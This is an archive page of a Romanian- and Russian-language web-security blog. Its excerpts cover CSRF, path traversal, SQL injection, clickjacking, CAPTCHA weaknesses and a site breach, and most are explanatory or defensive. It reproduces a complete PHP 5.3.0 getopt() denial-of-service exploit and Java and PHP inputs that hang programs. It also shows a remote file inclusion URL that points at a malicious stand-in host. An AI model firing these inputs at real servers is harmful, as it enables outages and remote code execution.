Archive for category Securitate Web
PHP и Java зависают при вводе цифрового значения 2.2250738585072011e-308
Posted by Grigori in Securitate Web on March 3, 2011
Было замечено, что php уходит в бесконечный цикл
$d = 2.2250738585072011e-308;
(То же самое происходит и при вводе значения целиком, 324 знака)
При этом, если использовать значение, как строковое, то проблем не происходит:
$d = '2.2250738585072011e-308'; echo $d;
Но стоит попытаться преобразовать его в цифру, сразу же возникают проблемы:
$d = '2.2250738585072011e-308'; echo $d + 0;
В чём же проблема? Число 2.2250738585072011e-308 представляет собой наибольшее число двойной точности с плавающей запятой. В шестнадцатеричной нотации оно выглядит так: 0×0.fffffffffffffp-1022. При этом, 2.2250738585072011e-308 одно из пяти чисел, которые корректно конвертируются в 0×0.fffffffffffffp-1022:
- 2.2250738585072007e-308
- 2.2250738585072008e-308
- 2.2250738585072009e-308
- 2.2250738585072010e-308
- 2.2250738585072011e-308
Но только 2.2250738585072011e-308 вызывает вышеописанные проблемы.
На данный момент, баг уже исправлен.
Подобный баг наблюдается и в Java. Данный код “повесит” компилятор:
class compilehang { public static void main(String[] args) { double d = 2.2250738585072012e-308; System.out.println("Value: " + d); } }
А вот этот фрагмент “повесит” программу во время исполнения:
class runhang { public static void main(String[] args) { System.out.println("Test:"); double d = Double.parseDouble("2.2250738585072012e-308"); System.out.println("Value: " + d); } }
Источник:
Exploringbinary
Be safe.
ANON OPS
Posted by Grigori in Atacuri, Securitate Web on December 10, 2010
Думаю, все слышали о недавних атаках на WikiLeaks, обрушившихся совсем недавно после того, как на сайте были опубликованы конфиденциальные и засекреченные документы. О том, как на сайт обрушились более 10 гигабит в секунду трафика, свалив его, о том, как Amazon забрал у сайта домен, о том, что Wikileaks попросил помощи у пользователей, предоставив счета для перевода денег. О том, как эти счета были благополучно закрыты компаниями Visa, Mastercard, PayPal, а швейцарский банк PostFinance заморозил личный счёт Assange (владелец сайта WikiLeaks), а его самого арестовали (за что бы вы думали? да, за преступления на сексуальной почве).
Не слышали? Правда? Ну что ж, значит, только что вы об этом услышали. Естественно, подобные действия не могли остаться незамеченными со стороны общественности. А возмущенная общественность не молчит. Аноним не дремлет, не забывает и не прощает. Read the rest of this entry »
Situl stireazilei.md nu e disponibil
Posted by Mihai in Atacuri, Securitate Web on November 22, 2010
Unul din cele mai obiective şi operative situri de ştiri din MoldNet astăzi a devenit nedisponibil.
Sunt abonat la RSS Feed de la stireazilei.md şi la accesarea unei ştiri am observat ca situl are dificultăţi tehnice, şi anume: din directoriul unde se află situl a fost şters fişierul principal care interpreta toate adresările de către vizitatorii sitului index.php .
În lipsa unei protecţii adecvate, toţi vizitatorii au putut vizualiza structura catalogului de fişiere din directoriul HOME al sitului. Printre fişierele disponibile au putut fi văzute fişierele de backup al bazei de date, parolele la conturile FTP la situl info-prim.md, precum şi coduri sursă ale sitului.
Se recomandă:
- modificarea tuturor parolelor de access la baza de date şi conturi FTP
- informarea info-prim.md de posibila scurgere de informaţie care a avut loc
- interzicerea accesului de către utilizatorii sitului la pachetele de terţă parte utilizate pentru redactarea conţinutului sitului şi la interfaţa de administrare a sitului.
- interzicerea din fişierul .htaccess sau httpd.conf a: accesului la fişierele care conţin parole şi backup-uri ale bazelor de date sau ale codurilor sursă; interzicerea vizualizării catalogului de fişiere prin parametrul Options -Indexes
- în cazul în care aceste defecţiuni tehnice au avut loc în urma unui atac informatic informarea organelor competente Secţia tehnologii informaţionale şi investigaţii ale infracţiunilor în domeniul informaticii din cadrul Procuraturii Generale
P.S. Ieri situl stireazilei.md a publicat material care într-un mod direct defaimează imaginea unor lideri politici din RM cu cîteva zile înainte de alegeri. Să fi fost această defecţiune tehnică o coincidenţă banală?
UPDATE:
Stirea zilei a confirmat un atac de tip Ddos asupra sitului.
Cross Site Request Forgery (CSRF): Descriere, exemple şi măsuri de control.
Posted by Mihai in Măsuri de control, Vulnerabilităţi on May 3, 2010
Vulnerabilitatea Cross-Site Request Forgery (CSRF) [se pronunţă Sea-Surf] se caracterizează prin faptul că aplicaţia web nu poate efectua verificări suficiente, pentru a determina dacă cererea primită de aplicaţie este consistentă, formată corect şi dacă a fost efectuată într-adevăr de către utilizatorul care a efectuat cererea şi nu de către altcineva.
Dacă un server/o aplicaţie web este concepută pentru a primi o cerere din partea unui client, fără nici un mecanism de verificare a autencităţii cererii (dacă aceasta a fost trimisă în mod intenţionat), atunci ar putea fi posibil ca un atacator să forţeze browserul unui client să efectuieze o cerere neintenţionată către serverul web, care va fi tratată ca o cerere autentică. Exploatarea acestei vulnerabilităţi poate fi efectuată prin intermediul unui URL, a unei imagini, a unei cereri XMLHttpRequest, etc. şi poate avea drept consecinţă divulgarea de date sau executarea de cod neintenţionat.
Exploatarea vulnerabilităţii Cross-Site Request Forgery(CSRF) este un alt tip de atac. În loc să exploateze încrederea pe care o are un utilizator într-o aplicaţie web, atacurile CSRF exploatează încrederea pe care o are un site în utilizatorii săi.
Read the rest of this entry »
Expunerea informaţiei prin mesajele de eroare
Posted by Mihai in Vulnerabilităţi on April 23, 2010
Informaţia sensibilă poate fi critică (cum ar fi parola), sau poate fi utilă pentru lansarea altor atacuri asupra altor subsisteme sau module. În cazul în care un atac eşuează, atacatorul poate utiliza informaţia din mesajele de eroare furnizate de server sau aplicaţie, pentru a lansa un alt atac. De exemplu o încercare de exploatare a vulnerabilităţii path traversal, ar putea furniza calea completă a aplicaţiei în sistemul de fişiere. La rîndul său, acest lucru ar putea fi utilizat pentru determinarea numărului de elemente “..” sau indicarea unei căi de acces către un fişier sau directoriu ţintă. Un atac ce utilizează vulnerabilitatea SQL Injection ar putea dezvălui structura tabelului, bazei de date, sau expune logica de interogare, şi posibil chiar parole sau informaţii sensibile utilizate în interogare. Read the rest of this entry »
Уязвимости и простота распознавания CAPTCHA на примерах
Posted by Grigori in Măsuri de control, Securitate Web, Vulnerabilităţi on April 19, 2010
CAPTCHA (от англ. «Completely Automated Public Turing test to tell Computers and Humans Apart» — полностью автоматизированный публичный тест Тьюринга для разделения компьютеров и людей) — тест, целью которого является определение того, кем является пользователь: человеком или ботом. Идея теста в том, что существуют задачи, элементарные для человека, но сложные для компьютера. Чаще всего данный тест используется для предотвращения регистрации ботов на сайтах, для предотвращения разного рода флуда или попыток подбора пароля.
Теперь давайте поговорим о том, как сделать разгадывание капчи как можно более просты для человека и как можно более сложным для компьютера.
Path Traversal: Descriere, exemple, riscuri implicate şi măsuri de control
Posted by Mihai in Măsuri de control, Vulnerabilităţi on April 15, 2010
Path Traversal – Limitarea insuficientă a căii fişierelor/directoriilor în sistemul de fişiere de un directoriu cu acces interzis.
Path Traversal se manifestă ca o vulnerabilitate a unei aplicaţii care utilizează datele de intrare ca parte componentă a căii destinate pentru identificarea unui fişier sau directoriu, şi accesarea directoriului părinte al căruia este interzisă, insă metodele de validare a datelor de intrare nu sunt corecte sau lipsesc. Astfel prin intermediul acestei vulnerabilităţi se poate obţine acces la conţinutul fişierelor şi directoriilor restricţionate iniţial,care se afla în afara directoriului predefinit.
Read the rest of this entry »
PHP 5.3.0 getopt() Denial of Service
Posted by Mihai in Exploits, Securitate Web on April 13, 2010
<?php ##################################################################### ## PHP 5.3.0 getopt() Denial of service ## Tested on WIN XP FR SP3, WIN VISTA FR SP2, Apache, PHP 5.3.0 ## Denial of service ## Author: Napst3r ## Greets To: My Laptop & all My Friends ##################################################################### $buffer = str_repeat('A:', 9999); $options = getopt($buffer); ?>
Atac necunoscut asupra WordPress: Au fost compromise sute de site-uri
Posted by Mihai in Atacuri, Securitate Web on April 13, 2010
Sute de bloggeri ce utilizează WordPress au descoperit că site-urile lor sunt inaacesibile, după ce o valoare critică a fost modificată în baza de date. Atacul pare sa afecteze chiar şi cea mai recentă versiune a popularei platforme de blogging şi până în prezent, nu a fost determinată modalitatea de atac asupra sistemului.
Sucuri Security Labs, raportează un număr îngrijorător de blog-uri care au fost compromise în ultima săptămînă, şi încearcă să redirecţioneze utlizatorii către o adresă care încarcă un program malware. Majoritatea site-urilor afectate, utilizează servicii de hosting furnizate de către Network Solutions.
Read the rest of this entry »
Încărcarea fişierelor – Riscuri implicate şi măsuri de control
Posted by Mihai in Măsuri de control, Securitate Web, Vulnerabilităţi on April 8, 2010
Dificultăţile care ar putea apărea în procesul de încărcare a fişierelor (file upload) trebuie identificate în timp util, şi identificarea riscurilor trebuie să aibă loc în procesul de planificare al proiectului. În unele cazuri dificultăţile pot fi evitate prin modificarea cerinţelor proiectului. Unele din întrebările critice la care trebuie ştiut răspunsul de la bun început sunt:
1. Cine va avea permisiunea de a încărca fişiere? Doar utilizatorii autentificaţi sau orice utilizator al sistemului? Read the rest of this entry »
Tehnică de ocolire a filtrelor URL cu ajutorul matematicii (simple)
Posted by Mihai in Atacuri, Securitate Web on April 6, 2010
Poate pentru cineva va fi o inovaţie, însă browser-ele moderne pot percepe URL nu doar în baza numerică zecimală, ci şi în baza 8, 16 şi chiar 32. Adică un URL de tipul 66.102.13.19 poate fi prezentat în diverse moduri Read the rest of this entry »
Metode de contraatac la atacurile asupra aplicaţiilor web
Posted by Mihai in Măsuri de control, Securitate Web on April 1, 2010
Conform politicilor şi regulamentelor interne, atunci cînd aplicaţia web este atacată, singurul lucru care îl putem face este să menţinem poziţia de apărare şi să primim loviturile cu decenţă. Este ilegal sau împotriva politicii organizaţionale de a contraataca – aceasta e treaba poliţiei. Cu toate acestea, eficacitatea de aplicare a legii este marginală şi atacatorii acţionează fără constrîngeri. Ei nu au nici un motiv de a opri atacul asupra sistemelor noastre şi nu e nimic ce am putea face decît să încercăm să îi blocăm. Cu toate acestea, există o modalitate de a contraataca într-un mod care nu implică vreun risc legal şi răspundere civilă. Militarii spun că, dacă un duşman nu poate fi distrus, el trebuie orbit; dacă nu poate fi orbit, el trebuie indus în eroare.
Read the rest of this entry »
ClickJacking: descriere şi măsuri de control
Posted by Mihai in Atacuri, Securitate Web on March 31, 2010
ClickJacking este o tehnică maliţioasa de a induce în eroare utilizatorii web în dezvăluirea de informaţii confidenţiale sau preluarea controlului asupra calculatorului în timp ce se face click pe paginile web aparent inofensive. Tehnica de ClickJacking profită de o vulnerabilitate într-o varietate mare de browsere şi platforme şi ia forma de cod încorporat sau script care se poate executa fără ştirea utilizatorului, cum ar fi clickul pe un buton care aparent efectuează o alta functie.
Termenul “ClickJacking” a fost inventat de către Jeremiah Grossman şi Robert Hansen in 2008. Exploitul este, de asemenea cunoscut ca UI redressing. ClickJacking poate fi inţeles şi ca un exemplu de confuzie.
ClickJacking e posibil de realizat deoarece caracteristicile aparent inofensive ale paginilor HTML, pot fi utilizate pentru a efectua acţiuni neaşteptate şi ofensive. Read the rest of this entry »
Методы предотвращения атак SQL Injection
Posted by Grigori in Măsuri de control, Securitate Web, Vulnerabilităţi on March 30, 2010
Для начала давайте попробуем разобраться, что же такое SQL Injection, какие они бывают, чем они опасны и зачем могут применяться. Read the rest of this entry »
Includerea fişierelor PHP, descriere şi măsuri de control
Posted by Mihai in Măsuri de control, Securitate Web, Vulnerabilităţi on March 29, 2010
Ce presupune “Includerea fişierelor PHP” (PHP File Inclusion)? E o greşeală care exploatează utilizarea neintenţionată a unei particularităţi periculoase specifice PHP. Un limbaj de programare complet, ca PHP, de obicei oferă facilitatea de a include fişiere suplimentare spre execuţie. Această caracteristică este utilizată frecvent pentru a include biblioteci, anteturi sau alte elemente de cod comune pentru mai multe pagini sau script-uri. PHP are implementată o particularitate suplimentară a acestei funcţionalităţi: Fişierul sau directoriul inclus nu e obligatoriu să fie unul local. Cu alte cuvinte, dacă un răufăcător reuşeşte să modifice numele fişierului indicat spre a fi inclus în unul de tip
http://exemple.com/?fisier=http://exemple-maliţioase.com/cod.php
atunci output-ul acestui URL va fi inclus şi executat în contextul scriptului local. Read the rest of this entry »